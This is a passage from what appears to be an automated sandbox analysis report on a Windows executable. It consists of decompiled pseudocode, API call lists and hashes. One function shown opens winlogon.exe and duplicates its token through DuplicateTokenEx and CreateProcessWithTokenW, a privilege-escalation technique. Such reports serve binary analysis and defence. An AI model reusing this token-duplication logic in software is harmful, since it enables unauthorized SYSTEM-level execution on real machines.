                                                                                                  							 *( *0x41c464 +  *0x41c468 * 4) =  *0x41c46c;
                                                                                                  							 *( *0x41c460 +  *0x41c468 * 4) = _t39;
                                                                                                  							 *0x41c468 =  *0x41c468 + 1;
                                                                                                  							 *0x41c46c =  *0x41c46c + _t61 + 1;
                                                                                                  							if(_t57 != 0) {
                                                                                                  								goto L21;
                                                                                                  							} else {
                                                                                                  								goto L20;
                                                                                                  							}
                                                                                                  						}
                                                                                                  					}
                                                                                                  				}
                                                                                                  				return _t22;
                                                                                                  			}














                                                                                                  0x00405b81
                                                                                                  0x00405b88
                                                                                                  0x00405b8a
                                                                                                  0x00405b8a
                                                                                                  0x00405b8f
                                                                                                  0x00405b96
                                                                                                  0x00405b9b
                                                                                                  0x00405bad
                                                                                                  0x00405bad
                                                                                                  0x00405b9d
                                                                                                  0x00405b9d
                                                                                                  0x00405ba8
                                                                                                  0x00405bab
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x00405bab
                                                                                                  0x00405be9
                                                                                                  0x00405be9
                                                                                                  0x00405baf
                                                                                                  0x00405bb1
                                                                                                  0x00405ce2
                                                                                                  0x00405ce2
                                                                                                  0x00405bb7
                                                                                                  0x00405bbd
                                                                                                  0x00405bf6
                                                                                                  0x00405c4b
                                                                                                  0x00405c4c
                                                                                                  0x00405c52
                                                                                                  0x00405c53
                                                                                                  0x00000000
                                                                                                  0x00405bf8
                                                                                                  0x00405c02
                                                                                                  0x00405c0e
                                                                                                  0x00405c13
                                                                                                  0x00405c18
                                                                                                  0x00405c2c
                                                                                                  0x00405c2e
                                                                                                  0x00405c3b
                                                                                                  0x00405c3c
                                                                                                  0x00405c42
                                                                                                  0x00000000
                                                                                                  0x00405c1a
                                                                                                  0x00405c25
                                                                                                  0x00405c2a
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x00405c2a
                                                                                                  0x00405c18
                                                                                                  0x00405bbf
                                                                                                  0x00405bc0
                                                                                                  0x00405bcd
                                                                                                  0x00405bce
                                                                                                  0x00405bd7
                                                                                                  0x00405c58
                                                                                                  0x00405c5f
                                                                                                  0x00405c61
                                                                                                  0x00405c61
                                                                                                  0x00405c63
                                                                                                  0x00405cdb
                                                                                                  0x00405cdb
                                                                                                  0x00405c65
                                                                                                  0x00405c65
                                                                                                  0x00405c74
                                                                                                  0x00000000
                                                                                                  0x00405c84
                                                                                                  0x00405c8a
                                                                                                  0x00405c8d
                                                                                                  0x00405c99
                                                                                                  0x00405caf
                                                                                                  0x00405cbd
                                                                                                  0x00405cc8
                                                                                                  0x00405cd4
                                                                                                  0x00405cd9
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x00405cd9
                                                                                                  0x00405c74
                                                                                                  0x00405c63
                                                                                                  0x00405ce6

                                                                                                  APIs
                                                                                                  • GetModuleHandleW.KERNEL32(00000000,?,?,00403490), ref: 00405BC0
                                                                                                  • wcscpy.MSVCRT ref: 00405C02
                                                                                                    • Part of subcall function 00405EDD: memset.MSVCRT ref: 00405EF0
                                                                                                    • Part of subcall function 00405EDD: _itow.MSVCRT ref: 00405EFE
                                                                                                  • wcslen.MSVCRT ref: 00405C20
                                                                                                  • GetModuleHandleW.KERNEL32(00000000,?,?,?,00403490), ref: 00405C2E
                                                                                                  • LoadStringW.USER32(00000000,000001F5,?), ref: 00405C59
                                                                                                  • memcpy.MSVCRT ref: 00405C99
                                                                                                    • Part of subcall function 00405ADF: ??2@YAPAXI@Z.MSVCRT ref: 00405B19
                                                                                                    • Part of subcall function 00405ADF: ??2@YAPAXI@Z.MSVCRT ref: 00405B37
                                                                                                    • Part of subcall function 00405ADF: ??2@YAPAXI@Z.MSVCRT ref: 00405B55
                                                                                                    • Part of subcall function 00405ADF: ??2@YAPAXI@Z.MSVCRT ref: 00405B73
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.279908586.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.279901099.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279921573.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279928879.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279942305.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
                                                                                                  • String ID: strings
                                                                                                  • API String ID: 3166385802-3030018805
                                                                                                  • Opcode ID: 484a3de7b2935987b64b240b2dbd95e532bbb3e4d7f0d1989cc78b1e10ca5163
                                                                                                  • Instruction ID: 6100db9a332bdf9cdae47e625800c2dd81fdb4e1827941160d8c77da4bb91491
                                                                                                  • Opcode Fuzzy Hash: 484a3de7b2935987b64b240b2dbd95e532bbb3e4d7f0d1989cc78b1e10ca5163
                                                                                                  • Instruction Fuzzy Hash: F0417A74188A149FEB149B54ECE5DB73376F785708720813AE802A72A1DB39AC46CF6C
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 75%
                                                                                                  			E00401E44(int _a4, int _a8, intOrPtr* _a12) {
                                                                                                  				char _v8;
                                                                                                  				void* _v12;
                                                                                                  				void* __esi;
                                                                                                  				void* _t18;
                                                                                                  				intOrPtr* _t22;
                                                                                                  				void* _t23;
                                                                                                  				void* _t28;
                                                                                                  				int _t37;
                                                                                                  				intOrPtr* _t39;
                                                                                                  				intOrPtr* _t40;
                                                                                                  
                                                                                                  				_v8 = 0;
                                                                                                  				_t18 = OpenProcess(0x2000000, 0, _a8);
                                                                                                  				_v12 = _t18;
                                                                                                  				if(_t18 == 0) {
                                                                                                  					_t37 = GetLastError();
                                                                                                  				} else {
                                                                                                  					_t39 = _a4 + 0x800;
                                                                                                  					_a8 = 0;
                                                                                                  					E0040289F(_t39);
                                                                                                  					_t22 =  *((intOrPtr*)(_t39 + 4));
                                                                                                  					if(_t22 == 0) {
                                                                                                  						_t23 = 0;
                                                                                                  					} else {
                                                                                                  						_t23 =  *_t22(_v12, 2,  &_a8);
                                                                                                  					}
                                                                                                  					if(_t23 == 0) {
                                                                                                  						_t37 = GetLastError();
                                                                                                  					} else {
                                                                                                  						_a4 = _a8;
                                                                                                  						E0040289F(_t39);
                                                                                                  						_t40 =  *((intOrPtr*)(_t39 + 8));
                                                                                                  						if(_t40 == 0) {
                                                                                                  							_t28 = 0;
                                                                                                  						} else {
                                                                                                  							_t28 =  *_t40(_a4, 0x2000000, 0, 2, 1,  &_v8);
                                                                                                  						}
                                                                                                  						if(_t28 == 0) {
                                                                                                  							_t37 = GetLastError();
                                                                                                  						} else {
                                                                                                  							 *_a12 = _v8;
                                                                                                  							_t37 = 0;
                                                                                                  						}
                                                                                                  						CloseHandle(_a8);
                                                                                                  					}
                                                                                                  					CloseHandle(_v12);
                                                                                                  				}
                                                                                                  				return _t37;
                                                                                                  			}













                                                                                                  0x00401e59
                                                                                                  0x00401e5c
                                                                                                  0x00401e64
                                                                                                  0x00401e67
                                                                                                  0x00401ef9
                                                                                                  0x00401e6d
                                                                                                  0x00401e70
                                                                                                  0x00401e76
                                                                                                  0x00401e79
                                                                                                  0x00401e7e
                                                                                                  0x00401e83
                                                                                                  0x00401e92
                                                                                                  0x00401e85
                                                                                                  0x00401e8e
                                                                                                  0x00401e8e
                                                                                                  0x00401e96
                                                                                                  0x00401ee6
                                                                                                  0x00401e98
                                                                                                  0x00401e9b
                                                                                                  0x00401e9e
                                                                                                  0x00401ea3
                                                                                                  0x00401ea8
                                                                                                  0x00401ebb
                                                                                                  0x00401eaa
                                                                                                  0x00401eb7
                                                                                                  0x00401eb7
                                                                                                  0x00401ebf
                                                                                                  0x00401ed3
                                                                                                  0x00401ec1
                                                                                                  0x00401ec7
                                                                                                  0x00401ec9
                                                                                                  0x00401ec9
                                                                                                  0x00401ed8
                                                                                                  0x00401ed8
                                                                                                  0x00401eeb
                                                                                                  0x00401eeb
                                                                                                  0x00401f01

                                                                                                  APIs
                                                                                                  • OpenProcess.KERNEL32(02000000,00000000,00000000,00000000,winlogon.exe,?,00000000,winlogon.exe,00000000), ref: 00401E5C
                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?,?), ref: 00401EF3
                                                                                                    • Part of subcall function 0040289F: LoadLibraryW.KERNEL32(advapi32.dll,?,00402271,?,?,00000000), ref: 004028AB
                                                                                                    • Part of subcall function 0040289F: GetProcAddress.KERNEL32(00000000,CreateProcessWithLogonW), ref: 004028C0
                                                                                                    • Part of subcall function 0040289F: GetProcAddress.KERNEL32(00000000,CreateProcessWithTokenW), ref: 004028CD
                                                                                                    • Part of subcall function 0040289F: GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 004028D9
                                                                                                    • Part of subcall function 0040289F: GetProcAddress.KERNEL32(00000000,DuplicateTokenEx), ref: 004028E6
                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?,?), ref: 00401ECD
                                                                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?), ref: 00401ED8
                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?,?), ref: 00401EE0
                                                                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?), ref: 00401EEB
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.279908586.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.279901099.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279921573.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279928879.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279942305.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: AddressProc$ErrorLast$CloseHandle$LibraryLoadOpenProcess
                                                                                                  • String ID: winlogon.exe
                                                                                                  • API String ID: 1315556178-961692650
                                                                                                  • Opcode ID: e4a5705fcdc82a33d7d09986f8f31284f2fb5d3fd113eab1cd0e790a40dcb407
                                                                                                  • Instruction ID: 37dd24dd8946aa7f8aa4240fd04c0d288f38f50501b3184a6b0aa07a3247aa85
                                                                                                  • Opcode Fuzzy Hash: e4a5705fcdc82a33d7d09986f8f31284f2fb5d3fd113eab1cd0e790a40dcb407
                                                                                                  • Instruction Fuzzy Hash: FB212932900114EFDB10AFA5CDC8AAE7BB5EB04350F14893AFE06F72A0D7749D41DA94
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 79%
                                                                                                  			E00405236(short* __ebx, intOrPtr _a4) {
                                                                                                  				int _v8;
                                                                                                  				char _v12;
                                                                                                  				void _v2058;
                                                                                                  				void _v2060;
                                                                                                  				int _t35;
                                                                                                  				int _t41;
                                                                                                  				signed int _t48;
                                                                                                  				signed int _t49;
                                                                                                  				signed short* _t50;
                                                                                                  				void** _t52;
                                                                                                  				void* _t53;
                                                                                                  				void* _t54;
                                                                                                  
                                                                                                  				_t48 = 0;
                                                                                                  				_v2060 = 0;
                                                                                                  				memset( &_v2058, 0, 0x7fe);
                                                                                                  				_t54 = _t53 + 0xc;
                                                                                                  				 *__ebx = 0;
                                                                                                  				_t52 = _a4 + 4;
                                                                                                  				_v12 = 2;
                                                                                                  				do {
                                                                                                  					_push( *_t52);
                                                                                                  					_t6 = _t52 - 4; // 0xe80040cb
                                                                                                  					_push( *_t6);
                                                                                                  					_push(L"%s (%s)");
                                                                                                  					_push(0x400);
                                                                                                  					_push( &_v2060);
                                                                                                  					L0040B1EC();
                                                                                                  					_t35 = wcslen( &_v2060);
                                                                                                  					_v8 = _t35;
                                                                                                  					memcpy(__ebx + _t48 * 2,  &_v2060, _t35 + _t35 + 2);
                                                                                                  					_t49 = _t48 + _v8 + 1;
                                                                                                  					_t41 = wcslen( *_t52);
                                                                                                  					_v8 = _t41;
                                                                                                  					memcpy(__ebx + _t49 * 2,  *_t52, _t41 + _t41 + 2);
                                                                                                  					_t54 = _t54 + 0x34;
                                                                                                  					_t52 =  &(_t52[2]);
                                                                                                  					_t23 =  &_v12;
                                                                                                  					 *_t23 = _v12 - 1;
                                                                                                  					_t48 = _t49 + _v8 + 1;
                                                                                                  				} while ( *_t23 != 0);
                                                                                                  				_t50 = __ebx + _t48 * 2;
                                                                                                  				 *_t50 =  *_t50 & 0x00000000;
                                                                                                  				_t50[1] = _t50[1] & 0x00000000;
                                                                                                  				return __ebx;
                                                                                                  			}















                                                                                                  0x00405241
                                                                                                  0x00405250
                                                                                                  0x00405257
                                                                                                  0x0040525f
                                                                                                  0x00405262
                                                                                                  0x00405265
                                                                                                  0x00405268
                                                                                                  0x0040526f
                                                                                                  0x0040526f
                                                                                                  0x00405277
                                                                                                  0x00405277
                                                                                                  0x0040527a
                                                                                                  0x0040527f
                                                                                                  0x00405284
                                                                                                  0x00405285
                                                                                                  0x00405291
                                                                                                  0x00405296
                                                                                                  0x004052a9
                                                                                                  0x004052b3
                                                                                                  0x004052b7
                                                                                                  0x004052bc
                                                                                                  0x004052ca
                                                                                                  0x004052d2
                                                                                                  0x004052d5
                                                                                                  0x004052d8
                                                                                                  0x004052d8
                                                                                                  0x004052db
                                                                                                  0x004052db
                                                                                                  0x004052e1
                                                                                                  0x004052e4
                                                                                                  0x004052e8
                                                                                                  0x004052f2

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.279908586.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.279901099.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279921573.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279928879.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279942305.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: memcpywcslen$_snwprintfmemset
                                                                                                  • String ID: %s (%s)
                                                                                                  • API String ID: 3979103747-1363028141
                                                                                                  • Opcode ID: 78317d02bfcb08935322c08fe3645b21644df8c2b86268209298db670e7b3c37
                                                                                                  • Instruction ID: 65e1e814fa0bf8ea8ab085bd6ee3311c73c19872bc06834ae6b579d31858dd7b
                                                                                                  • Opcode Fuzzy Hash: 78317d02bfcb08935322c08fe3645b21644df8c2b86268209298db670e7b3c37
                                                                                                  • Instruction Fuzzy Hash: C411517280020DEBCF21DF94CC49D8BB7B8FF44308F1144BAE944A7152EB74A6588BD8
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 78%
                                                                                                  			E0040614F(void* __ecx, void* __eflags, struct HWND__* _a4) {
                                                                                                  				void _v514;
                                                                                                  				short _v516;
                                                                                                  				void _v8710;
                                                                                                  				short _v8712;
                                                                                                  				int _t17;
                                                                                                  				WCHAR* _t26;
                                                                                                  
                                                                                                  				E0040B550(0x2204, __ecx);
                                                                                                  				_v8712 = 0;
                                                                                                  				memset( &_v8710, 0, 0x2000);
                                                                                                  				_t17 = GetDlgCtrlID(_a4);
                                                                                                  				_t34 = _t17;
                                                                                                  				GetWindowTextW(_a4,  &_v8712, 0x1000);
                                                                                                  				if(_t17 > 0 && _v8712 != 0) {
                                                                                                  					_v516 = 0;
                                                                                                  					memset( &_v514, 0, 0x1fe);
                                                                                                  					GetClassNameW(_a4,  &_v516, 0xff);
                                                                                                  					_t26 =  &_v516;
                                                                                                  					_push(L"sysdatetimepick32");
                                                                                                  					_push(_t26);
                                                                                                  					L0040B278();
                                                                                                  					if(_t26 != 0) {
                                                                                                  						E00406025(_t34,  &_v8712);
                                                                                                  					}
                                                                                                  				}
                                                                                                  				return 1;
                                                                                                  			}









                                                                                                  0x00406157
                                                                                                  0x0040616d
                                                                                                  0x00406174
                                                                                                  0x0040617f
                                                                                                  0x00406185
                                                                                                  0x00406196
                                                                                                  0x0040619e
                                                                                                  0x004061b6
                                                                                                  0x004061bd
                                                                                                  0x004061d4
                                                                                                  0x004061da
                                                                                                  0x004061e0
                                                                                                  0x004061e5
                                                                                                  0x004061e6
                                                                                                  0x004061ef
                                                                                                  0x004061f9
                                                                                                  0x004061ff
                                                                                                  0x004061ef
                                                                                                  0x00406206

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.279908586.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.279901099.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279921573.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279928879.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279942305.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: memset$ClassCtrlNameTextWindow_itow_wcsicmp
                                                                                                  • String ID: sysdatetimepick32
                                                                                                  • API String ID: 1028950076-4169760276
                                                                                                  • Opcode ID: 5da42dd6f8dc2a5a5ce51cfedbbbc012e548a5dc60c7f50195cd90505966b8bd
                                                                                                  • Instruction ID: a6c41b950ec0abdba219e0cd23eeccead18917629e413d377b87badc6c60029b
                                                                                                  • Opcode Fuzzy Hash: 5da42dd6f8dc2a5a5ce51cfedbbbc012e548a5dc60c7f50195cd90505966b8bd
                                                                                                  • Instruction Fuzzy Hash: 65117732840119BAEB20EB95DC89EDF777CEF04754F0040BAF518F1192E7345A81CA9D
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 68%
                                                                                                  			E00404706(long __edi, wchar_t* _a4) {
                                                                                                  				short _v8;
                                                                                                  				void* _t8;
                                                                                                  				void* _t10;
                                                                                                  				long _t14;
                                                                                                  				long _t24;
                                                                                                  
                                                                                                  				_t24 = __edi;
                                                                                                  				_t8 = 0;
                                                                                                  				_t14 = 0x1100;
                                                                                                  				if(__edi - 0x834 <= 0x383) {
                                                                                                  					_t8 = LoadLibraryExW(L"netmsg.dll", 0, 2);
                                                                                                  					if(0 != 0) {
                                                                                                  						_t14 = 0x1900;
                                                                                                  					}
                                                                                                  				}
                                                                                                  				if(FormatMessageW(_t14, _t8, _t24, 0x400,  &_v8, 0, 0) <= 0) {
                                                                                                  					_t10 = wcscpy(_a4, 0x40c4e8);
                                                                                                  				} else {
                                                                                                  					if(wcslen(_v8) < 0x400) {
                                                                                                  						wcscpy(_a4, _v8);
                                                                                                  					}
                                                                                                  					_t10 = LocalFree(_v8);
                                                                                                  				}
                                                                                                  				return _t10;
                                                                                                  			}








                                                                                                  0x00404706
                                                                                                  0x00404714
                                                                                                  0x0040471c
                                                                                                  0x00404721
                                                                                                  0x0040472b
                                                                                                  0x00404733
                                                                                                  0x00404735
                                                                                                  0x00404735
                                                                                                  0x00404733
                                                                                                  0x00404751
                                                                                                  0x00404780
                                                                                                  0x00404753
                                                                                                  0x0040475e
                                                                                                  0x00404766
                                                                                                  0x0040476c
                                                                                                  0x00404770
                                                                                                  0x00404770
                                                                                                  0x0040478a

                                                                                                  APIs
                                                                                                  • LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,00000000,?,?,004047FA,?,?,?,004035EB,?,?), ref: 0040472B
                                                                                                  • FormatMessageW.KERNEL32(00001100,00000000,?,00000400,?,00000000,00000000,?,00000000,?,?,004047FA,?,?,?,004035EB), ref: 00404749
                                                                                                  • wcslen.MSVCRT ref: 00404756
                                                                                                  • wcscpy.MSVCRT ref: 00404766
                                                                                                  • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000,?,00000000,?,?,004047FA,?,?,?,004035EB,?), ref: 00404770
                                                                                                  • wcscpy.MSVCRT ref: 00404780
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.279908586.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.279901099.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279921573.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279928879.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279942305.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
                                                                                                  • String ID: netmsg.dll
                                                                                                  • API String ID: 2767993716-3706735626
                                                                                                  • Opcode ID: 1e136739243523e06bb2833156c7d3ecb9fe647eacfe1b285a6198c622c21fe1
                                                                                                  • Instruction ID: 89adc518ee94488043421af4a237527fbec77c55aa854962abbb3bd0e0f931e1
                                                                                                  • Opcode Fuzzy Hash: 1e136739243523e06bb2833156c7d3ecb9fe647eacfe1b285a6198c622c21fe1
                                                                                                  • Instruction Fuzzy Hash: 4F01D471200114FAEB152B61DD8AE9F7A6CEB46796B20417AFA02B60D1DB755E0086AC
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 90%
                                                                                                  			E0040598B(void* __edx, void* __eflags, intOrPtr _a4) {
                                                                                                  				intOrPtr _v12;
                                                                                                  				void* _v16;
                                                                                                  				intOrPtr _v20;
                                                                                                  				char _v32;
                                                                                                  				char _v72;
                                                                                                  				void _v582;
                                                                                                  				long _v584;
                                                                                                  				void* __edi;
                                                                                                  				intOrPtr _t27;
                                                                                                  				wchar_t* _t34;
                                                                                                  				wchar_t* _t42;
                                                                                                  				long* _t43;
                                                                                                  				int _t44;
                                                                                                  				void* _t52;
                                                                                                  				void* _t54;
                                                                                                  				long _t56;
                                                                                                  				long* _t57;
                                                                                                  				void* _t60;
                                                                                                  
                                                                                                  				_t60 = __eflags;
                                                                                                  				_t52 = __edx;
                                                                                                  				E004095AB( &_v72);
                                                                                                  				_v584 = 0;
                                                                                                  				memset( &_v582, 0, 0x1fe);
                                                                                                  				E004095FD(_t52, _t60,  &_v72);
                                                                                                  				_t27 = 0;
                                                                                                  				_v12 = 0;
                                                                                                  				if(_v20 <= 0) {
                                                                                                  					L10:
                                                                                                  					_t56 = 0;
                                                                                                  				} else {
                                                                                                  					do {
                                                                                                  						_t57 = E00405A92(_t27,  &_v32);
                                                                                                  						if(E00409A94( *_t57,  &_v584) == 0) {
                                                                                                  							goto L9;
                                                                                                  						} else {
                                                                                                  							_t34 =  &_v584;
                                                                                                  							_push(_t34);
                                                                                                  							_push(_a4);
                                                                                                  							L0040B278();
                                                                                                  							if(_t34 == 0) {
                                                                                                  								L5:
                                                                                                  								_t44 = 0;
                                                                                                  								_t54 = OpenProcess(0x2000000, 0,  *_t57);
                                                                                                  								if(_t54 == 0) {
                                                                                                  									goto L9;
                                                                                                  								} else {
                                                                                                  									_v16 = _v16 & 0;
                                                                                                  									if(OpenProcessToken(_t54, 2,  &_v16) != 0) {
                                                                                                  										_t44 = 1;
                                                                                                  										CloseHandle(_v16);
                                                                                                  									}
                                                                                                  									CloseHandle(_t54);
                                                                                                  									if(_t44 != 0) {
                                                                                                  										_t56 =  *_t57;
                                                                                                  									} else {
                                                                                                  										goto L9;
                                                                                                  									}
                                                                                                  								}
                                                                                                  							} else {
                                                                                                  								_t42 = wcschr( &_v584, 0x5c);
                                                                                                  								if(_t42 == 0) {
                                                                                                  									goto L9;
                                                                                                  								} else {
                                                                                                  									_t43 =  &(_t42[0]);
                                                                                                  									_push(_t43);
                                                                                                  									_push(_a4);
                                                                                                  									L0040B278();
                                                                                                  									if(_t43 != 0) {
                                                                                                  										goto L9;
                                                                                                  									} else {
                                                                                                  										goto L5;
                                                                                                  									}
                                                                                                  								}
                                                                                                  							}
                                                                                                  						}
                                                                                                  						goto L12;
                                                                                                  						L9:
                                                                                                  						_t27 = _v12 + 1;
                                                                                                  						_v12 = _t27;
                                                                                                  					} while (_t27 < _v20);
                                                                                                  					goto L10;
                                                                                                  				}
                                                                                                  				L12:
                                                                                                  				E004095DA( &_v72);
                                                                                                  				return _t56;
                                                                                                  			}





















                                                                                                  0x0040598b
                                                                                                  0x0040598b
                                                                                                  0x0040599a
                                                                                                  0x004059ae
                                                                                                  0x004059b5
                                                                                                  0x004059c1
                                                                                                  0x004059c6
                                                                                                  0x004059cb
                                                                                                  0x004059ce
                                                                                                  0x00405a7b
                                                                                                  0x00405a7b
                                                                                                  0x004059d4
                                                                                                  0x004059d4
                                                                                                  0x004059dc
                                                                                                  0x004059ee
                                                                                                  0x00000000
                                                                                                  0x004059f0
                                                                                                  0x004059f0
                                                                                                  0x004059f6
                                                                                                  0x004059f7
                                                                                                  0x004059fa
                                                                                                  0x00405a03
                                                                                                  0x00405a2b
                                                                                                  0x00405a2e
                                                                                                  0x00405a3c
                                                                                                  0x00405a40
                                                                                                  0x00000000
                                                                                                  0x00405a42
                                                                                                  0x00405a42
                                                                                                  0x00405a54
                                                                                                  0x00405a59
                                                                                                  0x00405a5a
                                                                                                  0x00405a5a
                                                                                                  0x00405a61
                                                                                                  0x00405a69
                                                                                                  0x00405a7f
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x00405a69
                                                                                                  0x00405a05
                                                                                                  0x00405a0e
                                                                                                  0x00405a17
                                                                                                  0x00000000
                                                                                                  0x00405a19
                                                                                                  0x00405a19
                                                                                                  0x00405a1c
                                                                                                  0x00405a1d
                                                                                                  0x00405a20
                                                                                                  0x00405a29
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x00405a29
                                                                                                  0x00405a17
                                                                                                  0x00405a03
                                                                                                  0x00000000
                                                                                                  0x00405a6b
                                                                                                  0x00405a6e
                                                                                                  0x00405a72
                                                                                                  0x00405a72
                                                                                                  0x00000000
                                                                                                  0x004059d4
                                                                                                  0x00405a81
                                                                                                  0x00405a84
                                                                                                  0x00405a8f

                                                                                                  APIs
                                                                                                  • memset.MSVCRT ref: 004059B5
                                                                                                    • Part of subcall function 004095FD: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00409619
                                                                                                    • Part of subcall function 004095FD: memset.MSVCRT ref: 0040962E
                                                                                                    • Part of subcall function 004095FD: Process32FirstW.KERNEL32(?,?), ref: 0040964A
                                                                                                    • Part of subcall function 004095FD: Process32NextW.KERNEL32(?,0000022C), ref: 0040978C
                                                                                                    • Part of subcall function 004095FD: CloseHandle.KERNEL32(?,?,0000022C,?,?,?,?,00000000,?), ref: 0040979C
                                                                                                    • Part of subcall function 00409A94: memset.MSVCRT ref: 00409AB7
                                                                                                    • Part of subcall function 00409A94: memset.MSVCRT ref: 00409ACF
                                                                                                    • Part of subcall function 00409A94: OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,00000000,00000000), ref: 00409AE0
                                                                                                    • Part of subcall function 00409A94: memset.MSVCRT ref: 00409B25
                                                                                                    • Part of subcall function 00409A94: GetProcAddress.KERNEL32(?,GetTokenInformation), ref: 00409B4B
                                                                                                    • Part of subcall function 00409A94: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000008,?), ref: 00409C26
                                                                                                    • Part of subcall function 00409A94: FreeLibrary.KERNEL32(?,?,?,?,?,?,00000000,00000008,?,?,?,?,?,00000000,00000000), ref: 00409C34
                                                                                                  • _wcsicmp.MSVCRT ref: 004059FA
                                                                                                  • wcschr.MSVCRT ref: 00405A0E
                                                                                                  • _wcsicmp.MSVCRT ref: 00405A20
                                                                                                  • OpenProcess.KERNEL32(02000000,00000000,00000000,00000000,?,?,?,?,00000000), ref: 00405A36
                                                                                                  • OpenProcessToken.ADVAPI32(00000000,00000002,?), ref: 00405A4C
                                                                                                  • CloseHandle.KERNEL32(?), ref: 00405A5A
                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00405A61
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.279908586.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.279901099.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279921573.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279928879.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279942305.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: memset$CloseHandle$OpenProcess$Process32_wcsicmp$AddressCreateFirstFreeLibraryNextProcSnapshotTokenToolhelp32wcschr
                                                                                                  • String ID:
                                                                                                  • API String ID: 768606695-0
                                                                                                  • Opcode ID: 24c99ff6b226417a7cff51520edeb71ca8997190fc09f0f890f68f92aaad849e
                                                                                                  • Instruction ID: 2def5e4e0f7fb713a9aee1133a075480eaa7d54608268b88a97ef3230c71c50c
                                                                                                  • Opcode Fuzzy Hash: 24c99ff6b226417a7cff51520edeb71ca8997190fc09f0f890f68f92aaad849e
